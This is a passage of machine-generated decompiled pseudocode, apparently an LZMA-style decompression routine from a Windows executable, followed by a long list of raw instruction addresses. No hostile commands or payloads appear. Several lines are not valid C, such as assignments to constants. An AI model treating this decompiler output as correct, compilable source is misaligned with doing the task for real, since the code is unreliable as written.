												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00000000
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063b2
                                                                                                                          0x004063b9
                                                                                                                          0x004063be
                                                                                                                          0x0040629f
                                                                                                                          0x004062a2
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406665
                                                                                                                          0x00406669
                                                                                                                          0x00406818
                                                                                                                          0x0040682e
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x0040683f
                                                                                                                          0x00406846
                                                                                                                          0x0040684a
                                                                                                                          0x0040684a
                                                                                                                          0x00406675
                                                                                                                          0x0040667c
                                                                                                                          0x00406684
                                                                                                                          0x00406687
                                                                                                                          0x0040668a
                                                                                                                          0x0040668a
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e2c
                                                                                                                          0x00405e35
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00000000
                                                                                                                          0x00405e46
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e4f
                                                                                                                          0x00405e52
                                                                                                                          0x00405e55
                                                                                                                          0x00405e59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e5f
                                                                                                                          0x00405e62
                                                                                                                          0x00405e64
                                                                                                                          0x00405e65
                                                                                                                          0x00405e68
                                                                                                                          0x00405e6a
                                                                                                                          0x00405e6b
                                                                                                                          0x00405e6d
                                                                                                                          0x00405e70
                                                                                                                          0x00405e75
                                                                                                                          0x00405e7a
                                                                                                                          0x00405e83
                                                                                                                          0x00405e96
                                                                                                                          0x00405e99
                                                                                                                          0x00405ea5
                                                                                                                          0x00405ecd
                                                                                                                          0x00405ecf
                                                                                                                          0x00405edd
                                                                                                                          0x00405edd
                                                                                                                          0x00405ee1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed1
                                                                                                                          0x00405ed4
                                                                                                                          0x00405ed5
                                                                                                                          0x00405ed5
                                                                                                                          0x00000000
                                                                                                                          0x00405ed1
                                                                                                                          0x00405eab
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb0
                                                                                                                          0x00405eb9
                                                                                                                          0x00405ec1
                                                                                                                          0x00405ec4
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405ee7
                                                                                                                          0x00405ee7
                                                                                                                          0x00405eeb
                                                                                                                          0x00406797
                                                                                                                          0x00000000
                                                                                                                          0x00406797
                                                                                                                          0x00405ef4
                                                                                                                          0x00405f04
                                                                                                                          0x00405f07
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0d
                                                                                                                          0x00405f11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f13
                                                                                                                          0x00405f19
                                                                                                                          0x00405f43
                                                                                                                          0x00405f49
                                                                                                                          0x00405f50
                                                                                                                          0x00000000
                                                                                                                          0x00405f50
                                                                                                                          0x00405f1f
                                                                                                                          0x00405f22
                                                                                                                          0x00405f27
                                                                                                                          0x00405f27
                                                                                                                          0x00405f32
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f82
                                                                                                                          0x00405f88
                                                                                                                          0x00405f8b
                                                                                                                          0x00405f98
                                                                                                                          0x00405fa0
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f57
                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406063
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x00406069
                                                                                                                          0x0040606c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406072
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060a9
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060d8
                                                                                                                          0x004060dc
                                                                                                                          0x004060de
                                                                                                                          0x004060e2
                                                                                                                          0x004060ae
                                                                                                                          0x004060ae
                                                                                                                          0x004060b2
                                                                                                                          0x004060ba
                                                                                                                          0x004060bf
                                                                                                                          0x004060c1
                                                                                                                          0x004060c3
                                                                                                                          0x004060c3
                                                                                                                          0x004060e5
                                                                                                                          0x004060ec
                                                                                                                          0x004060ef
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00000000
                                                                                                                          0x004060fa
                                                                                                                          0x004060fa
                                                                                                                          0x004060fe
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x00406104
                                                                                                                          0x00406107
                                                                                                                          0x0040610a
                                                                                                                          0x0040610e
                                                                                                                          0x00406111
                                                                                                                          0x00406117
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x0040611c
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x0040611f
                                                                                                                          0x00406125
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406127
                                                                                                                          0x0040612a
                                                                                                                          0x0040612d
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613c
                                                                                                                          0x0040613f
                                                                                                                          0x00406142
                                                                                                                          0x00406145
                                                                                                                          0x0040615d
                                                                                                                          0x00406160
                                                                                                                          0x00406163
                                                                                                                          0x00406166
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x0040616d
                                                                                                                          0x0040616f
                                                                                                                          0x00406147
                                                                                                                          0x00406147
                                                                                                                          0x0040614f
                                                                                                                          0x00406154
                                                                                                                          0x00406156
                                                                                                                          0x00406158
                                                                                                                          0x00406158
                                                                                                                          0x00406172
                                                                                                                          0x00406179
                                                                                                                          0x0040617c
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x00000000
                                                                                                                          0x0040617e
                                                                                                                          0x0040617c
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061be
                                                                                                                          0x004061be
                                                                                                                          0x004061c2
                                                                                                                          0x004067ca
                                                                                                                          0x00000000
                                                                                                                          0x004067ca
                                                                                                                          0x004061c8
                                                                                                                          0x004061cb
                                                                                                                          0x004061ce
                                                                                                                          0x004061d2
                                                                                                                          0x004061d5
                                                                                                                          0x004061db
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e3
                                                                                                                          0x004061e3
                                                                                                                          0x004061e9
                                                                                                                          0x00406187
                                                                                                                          0x00406187
                                                                                                                          0x0040618a
                                                                                                                          0x00000000
                                                                                                                          0x0040618a
                                                                                                                          0x004061eb
                                                                                                                          0x004061eb
                                                                                                                          0x004061ee
                                                                                                                          0x004061f1
                                                                                                                          0x004061f4
                                                                                                                          0x004061f7
                                                                                                                          0x004061fa
                                                                                                                          0x004061fd
                                                                                                                          0x00406200
                                                                                                                          0x00406203
                                                                                                                          0x00406206
                                                                                                                          0x00406209
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406227
                                                                                                                          0x0040622a
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040620b
                                                                                                                          0x0040620b
                                                                                                                          0x00406213
                                                                                                                          0x00406218
                                                                                                                          0x0040621a
                                                                                                                          0x0040621c
                                                                                                                          0x0040621c
                                                                                                                          0x00406236
                                                                                                                          0x0040623d
                                                                                                                          0x00406240
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x00000000
                                                                                                                          0x004064cf
                                                                                                                          0x004064cf
                                                                                                                          0x004064d3
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x004067fa
                                                                                                                          0x004064d9
                                                                                                                          0x004064dc
                                                                                                                          0x004064df
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064ec
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065de
                                                                                                                          0x004065e2
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x00406611
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x004065e4
                                                                                                                          0x004065e7
                                                                                                                          0x004065eb
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
